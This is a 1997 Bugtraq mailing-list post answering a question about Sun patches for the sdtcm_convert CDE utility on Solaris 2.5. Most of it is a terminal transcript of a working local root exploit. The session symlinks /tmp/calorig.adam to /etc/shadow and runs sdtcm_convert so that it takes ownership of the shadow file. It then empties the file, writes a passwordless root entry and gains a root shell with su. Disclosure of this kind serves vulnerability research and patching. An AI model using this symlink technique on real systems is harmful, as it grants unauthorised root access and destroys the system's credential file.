[4085] in bugtraq
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
daemon@ATHENA.MIT.EDU (Adam Morrison)
Sun Feb 23 14:19:45 1997
Date: Sun, 23 Feb 1997 12:45:40 +0200
Reply-To: Adam Morrison <adam@MATH.TAU.AC.IL>
From: Adam Morrison <adam@MATH.TAU.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
> Is this the bug fixed in the Sun patches:
> 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
> or is it a new one?
That's hard to know, since this patch is not publicly available off
SunSolve (not right now, anyway).
There's at least one other hole in sdtcm_convert which this patch may or not
fix.
CDE is generally a can of worms.
$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
Script started on Thu Jul 11 22:15:03 1996
22:15 [wumpus:~] % whoami
adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...
WARNING!! Data will be lost when converting version 4 data format
back to version 3 data format.
Do you want to continue? (Y/N) [Y] y
Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments = 0
Number of one-time appointments converted = 0
Number of repeating appointments converted = 0
Number of one-time appointments pruned = 0
Number of repeating appointments pruned = 0
The original file is saved in /tmp/calorig.adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % chmod 644 /etc/shadow
22:15 [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15 [wumpus:~] % ls -l /etc/shadow
-rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16 [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit
script done on Thu Jul 11 22:16:21 1996
adam?
